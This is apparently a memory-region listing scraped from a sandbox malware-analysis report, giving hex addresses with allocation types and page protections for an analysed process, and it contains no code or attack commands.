page read and write
820000
heap
page read and write
2400000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
223000
heap
page read and write
4FE000
heap
page read and write
12E7C000
trusted library allocation
page read and write
3588000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
2D3000
heap
page read and write
E84000
heap
page read and write
24C0000
heap
page read and write
3396000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
10000
heap
page read and write
57B0000
trusted library allocation
page read and write
22D0000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
40FA000
heap
page read and write
10053000
unkown
page read and write
2AA4000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
29D0000
remote allocation
page read and write
31A0000
trusted library allocation
page read and write
564000
heap
page read and write
408B000
heap
page read and write
2AC1000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
756000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
33CD000
trusted library allocation
page read and write
5A20000
heap
page read and write
2825000
trusted library allocation
page read and write
3BFC000
trusted library allocation
page read and write
16A000
heap
page read and write
3592000
trusted library allocation
page read and write
40AF000
heap
page read and write
3F0000
heap
page read and write
314A000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
835E000
trusted library allocation
page read and write
2400000
trusted library allocation
page read and write
5A55000
heap
page read and write
1B630000
heap
page read and write
57C3000
trusted library allocation
page read and write
5AD9000
heap
page read and write
57A8000
trusted library allocation
page read and write
654000
heap
page read and write
34D4000
trusted library allocation
page execute
53B000
heap
page read and write
374E000
trusted library allocation
page read and write
10000
heap
page read and write
2AE8000
trusted library allocation
page read and write
35BE000
stack
page read and write
2B85000
trusted library allocation
page read and write
408D000
heap
page read and write
2B4B000
heap
page read and write
26A0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2D6000
trusted library allocation
page read and write
25D6000
trusted library allocation
page read and write
25F0000
heap
page read and write
29CD000
stack
page read and write
180000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
190000
heap
page read and write
835E000
trusted library allocation
page read and write
40F4000
heap
page read and write
1BC50000
heap
page read and write
342B000
trusted library allocation
page read and write
5A88000
heap
page read and write
AC0000
heap
page read and write
28D0000
trusted library allocation
page read and write
5910000
heap
page read and write
3410000
trusted library allocation
page read and write
8C4E000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2600000
trusted library allocation
page read and write
38BD000
unkown
page read and write
57B4000
trusted library allocation
page read and write
3BCE000
trusted library allocation
page read and write
40F1000
heap
page read and write
53B000
heap
page read and write
3410000
trusted library allocation
page read and write
3411000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
7FF001E0000
trusted library allocation
page execute and read and write
3040000
trusted library allocation
page read and write
506000
heap
page read and write
57C3000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
3055000
trusted library allocation
page read and write
3B4F000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
7FF00032000
trusted library allocation
page execute and read and write
342B000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
5A54000
heap
page read and write
1B520000
heap
page read and write
5A6F000
heap
page read and write
856000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
315C000
trusted library allocation
page read and write
4073000
heap
page read and write
7FF00260000
trusted library allocation
page execute and read and write
420B000
stack
page read and write
2AC8000
trusted library allocation
page read and write
31A5000
trusted library allocation
page read and write
938000
heap
page read and write
2AE0000
trusted library allocation
page read and write
40F8000
heap
page read and write
1005A000
unkown
page readonly
28D0000
trusted library allocation
page read and write
10046000
unkown
page readonly
4A4000
heap
page read and write
2CF0000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
31DD000
trusted library allocation
page read and write
2AC6000
heap
page read and write
57C3000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page read and write
870000
heap
page read and write
3157000
trusted library allocation
page read and write
3147000
trusted library allocation
page read and write
3414000
trusted library allocation
page read and write
446A000
stack
page read and write
5A3E000
heap
page read and write
E81E000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
2F0000
heap
page read and write
33A3000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
1BC000
stack
page read and write
314D000
trusted library allocation
page read and write
15A000
stack
page read and write
55C7000
heap
page read and write
374E000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
22E000
heap
page read and write
40EC000
heap
page read and write
4000000
heap
page read and write
29A0000
trusted library allocation
page read and write
22C000
stack
page read and write
302E000
stack
page read and write
3BC1000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
5AEE000
heap
page read and write
3157000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
10053000
unkown
page read and write
1B6A0000
heap
page read and write
2AC1000
trusted library allocation
page read and write
38C5000
trusted library allocation
page read and write
6DA000
heap
page read and write
150000
heap
page read and write
4061000
heap
page read and write
630000
heap
page read and write
38A5000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
2A11000
trusted library allocation
page read and write
31F9000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
830000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
29D0000
heap
page read and write
3175000
trusted library allocation
page read and write
295000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
860E000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
5A53000
heap
page read and write
2E4000
heap
page read and write
E81E000
trusted library allocation
page read and write
431E000
stack
page read and write
3149000
trusted library allocation
page read and write
4F1000
heap
page read and write
5780000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
5A97000
heap
page read and write
299E000
stack
page read and write
2AD6000
trusted library allocation
page read and write
10057000
unkown
page read and write
405F000
heap
page read and write
315E000
trusted library allocation
page read and write
3B0000
remote allocation
page read and write
5A9C000
heap
page read and write
32D0000
trusted library allocation
page execute
40F6000
heap
page read and write
342B000
trusted library allocation
page read and write
2C80000
heap
page execute and read and write
7FF00290000
trusted library allocation
page execute and read and write
330F000
trusted library allocation
page read and write
50C000
heap
page read and write
40F8000
heap
page read and write
28D0000
trusted library allocation
page read and write
724000
heap
page read and write
430000
heap
page read and write
457000
heap
page read and write
5AA7000
heap
page read and write
7FF00250000
trusted library allocation
page execute and read and write
28D0000
trusted library allocation
page read and write
448000
heap
page read and write
7FF000E0000
trusted library allocation
page read and write
2E9E000
stack
page read and write
57B4000
trusted library allocation
page read and write
5780000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
4FE000
heap
page read and write
2AEF000
trusted library allocation
page read and write
2D80000
unkown
page read and write
20000
heap
page read and write
5A6F000
heap
page read and write
22D0000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
350000
heap
page read and write
442000
trusted library section
page read and write
2902000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
1F0000
heap
page read and write
38AF000
trusted library allocation
page read and write
2974000
heap
page read and write
57B0000
trusted library allocation
page read and write
377B000
trusted library allocation
page read and write
950000
heap
page read and write
40F4000
heap
page read and write
40D7000
heap
page read and write
40FA000
heap
page read and write
2AE0000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
30B5000
unkown
page read and write
2900000
trusted library allocation
page read and write
2500000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
26C5000
trusted library allocation
page read and write
40FA000
heap
page read and write
3152000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
40FD000
heap
page read and write
3BBB000
trusted library allocation
page read and write
2600000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
4E3000
heap
page read and write
28AE000
stack
page read and write
38B6000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
3114000
trusted library section
page readonly
822E000
trusted library allocation
page read and write
40AF000
heap
page read and write
33C2000
trusted library allocation
page read and write
E80000
trusted library allocation
page read and write
3716000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
40EC000
heap
page read and write
29F8000
trusted library allocation
page read and write
360000
heap
page read and write
57A8000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
10000000
unkown
page readonly
57C3000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
2AA000
heap
page read and write
2AC1000
trusted library allocation
page read and write
840000
heap
page read and write
38B3000
trusted library allocation
page read and write
38C8000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page read and write
434000
heap
page read and write
88C0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
36F4000
trusted library allocation
page read and write
25D5000
trusted library allocation
page read and write
3742000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
410000
heap
page read and write
845E000
trusted library allocation
page read and write
3755000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
382E000
unkown
page read and write
D70000
heap
page read and write
57C3000
trusted library allocation
page read and write
72D000
heap
page read and write
14B000
heap
page read and write
57B4000
trusted library allocation
page read and write
159000
heap
page read and write
2A94000
trusted library allocation
page read and write
2970000
heap
page read and write
5AB8000
heap
page read and write
33FF000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
10000000
unkown
page readonly
1B1000
heap
page read and write
4E0000
heap
page read and write
2E65000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
3396000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page execute and read and write
10046000
unkown
page readonly
40FD000
heap
page read and write
57C3000
trusted library allocation
page read and write
130000
heap
page read and write
2997000
heap
page read and write
4FE000
heap
page read and write
2A94000
trusted library allocation
page read and write
3193000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
27D0000
trusted library allocation
page read and write
2D5000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
8F2E000
trusted library allocation
page read and write
40EC000
heap
page read and write
27F5000
trusted library allocation
page read and write
26C6000
trusted library allocation
page read and write
7FF00210000
trusted library allocation
page execute and read and write
342C000
trusted library allocation
page read and write
4F1000
heap
page read and write
53F000
heap
page read and write
33FF000
trusted library allocation
page read and write
417000
heap
page read and write
8EE000
stack
page read and write
38B3000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
38A5000
trusted library allocation
page read and write
9C000
stack
page read and write
3739000
trusted library allocation
page read and write
10053000
unkown
page read and write
38B3000
trusted library allocation
page read and write
328F000
stack
page read and write
57C3000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
34D1000
trusted library allocation
page execute
163000
heap
page read and write
373F000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
311B000
trusted library allocation
page read and write
530000
heap
page read and write
33B5000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
3154000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
3163000
trusted library allocation
page read and write
8D9E000
trusted library allocation
page read and write
3784000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
300000
heap
page read and write
10000
heap
page read and write
2AEF000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
8F9E000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
28A6000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
38CD000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
1CF000
heap
page read and write
3781000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
3CBB000
stack
page read and write
88C0000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
31B5000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
2C2E000
stack
page read and write
303E000
stack
page read and write
38AF000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
There are 1661 hidden memdumps, click here to show them.